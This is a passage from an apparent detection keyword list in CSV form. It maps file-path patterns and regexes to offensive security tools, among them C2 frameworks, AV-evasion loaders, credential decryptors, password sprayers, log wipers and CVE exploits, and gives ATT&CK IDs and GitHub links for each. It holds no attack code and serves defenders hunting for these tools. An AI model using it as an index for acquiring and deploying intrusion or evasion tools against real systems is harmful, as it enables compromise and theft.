"*/MITMRecorder.py*",".{0,1000}\/MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/mmouse-brute.nse*",".{0,1000}\/mmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mmouse-exec.nse*",".{0,1000}\/mmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mockingjay_BOF.git*",".{0,1000}\/Mockingjay_BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*/modbus-discover.nse*",".{0,1000}\/modbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Models/PowerShellLauncher.*",".{0,1000}\/Models\/PowerShellLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Models/Regsvr32Launcher.*",".{0,1000}\/Models\/Regsvr32Launcher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Models/ShellCodeLauncher.*",".{0,1000}\/Models\/ShellCodeLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/Modlishka.git*",".{0,1000}\/Modlishka\.git.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*/module/darkexe/*",".{0,1000}\/module\/darkexe\/.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/Modules/Exitservice/uinit.exe*",".{0,1000}\/Modules\/Exitservice\/uinit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/modules/kull_m_crypto_system.h*",".{0,1000}\/modules\/kull_m_crypto_system\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/modules/payload/*",".{0,1000}\/modules\/payload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/momyshark.html*",".{0,1000}\/momyshark\.html.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*/mongodb-brute.nse*",".{0,1000}\/mongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-databases.nse*",".{0,1000}\/mongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mongodb-info.nse*",".{0,1000}\/mongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/monkey.py",".{0,1000}\/monkey\.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/monkey_island.py*",".{0,1000}\/monkey_island\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/MonkeyWorks.git*",".{0,1000}\/MonkeyWorks\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/moonwalk.git*",".{0,1000}\/moonwalk\.git.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/moonwalk_darwin*",".{0,1000}\/moonwalk_darwin.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/Moriarty.exe*",".{0,1000}\/Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/mortar.git*",".{0,1000}\/mortar\.git.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mortar/releases/download/v2/encryptor*",".{0,1000}\/mortar\/releases\/download\/v2\/encryptor.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mouselogger.py*",".{0,1000}\/mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mqtt-subscribe.nse*",".{0,1000}\/mqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mRemoteNG-Decrypt*",".{0,1000}\/mRemoteNG\-Decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","120","43","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" "*/mrinfo.nse*",".{0,1000}\/mrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mr-Un1k0d3r/*",".{0,1000}\/Mr\-Un1k0d3r\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/Mr-xn/cve-2022-23131*",".{0,1000}\/Mr\-xn\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","149","45","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*/MS15-034.nse*",".{0,1000}\/MS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/ms17-010.py*",".{0,1000}\/ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/msf.go",".{0,1000}\/msf\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/msf.swf*",".{0,1000}\/msf\.swf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfcrawler*",".{0,1000}\/msfcrawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfnonstaged.exe*",".{0,1000}\/msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/msfpc.sh*",".{0,1000}\/msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1176","267","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" "*/msfstaged.exe*",".{0,1000}\/msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/msftest/*",".{0,1000}\/msftest\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msfvenom/*",".{0,1000}\/msfvenom\/.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/msf-ws.log*",".{0,1000}\/msf\-ws\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MsgKitTestTool/*",".{0,1000}\/MsgKitTestTool\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/Mshikaki.git*",".{0,1000}\/Mshikaki\.git.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*/mshta.cmd*",".{0,1000}\/mshta\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/mshtajs.cmd*",".{0,1000}\/mshtajs\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/msi_search.ps1*",".{0,1000}\/msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msi-search.git*",".{0,1000}\/msi\-search\.git.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msLDAPDump*",".{0,1000}\/msLDAPDump.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*/msol.py*",".{0,1000}\/msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/MSOLSpray*",".{0,1000}\/MSOLSpray.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" 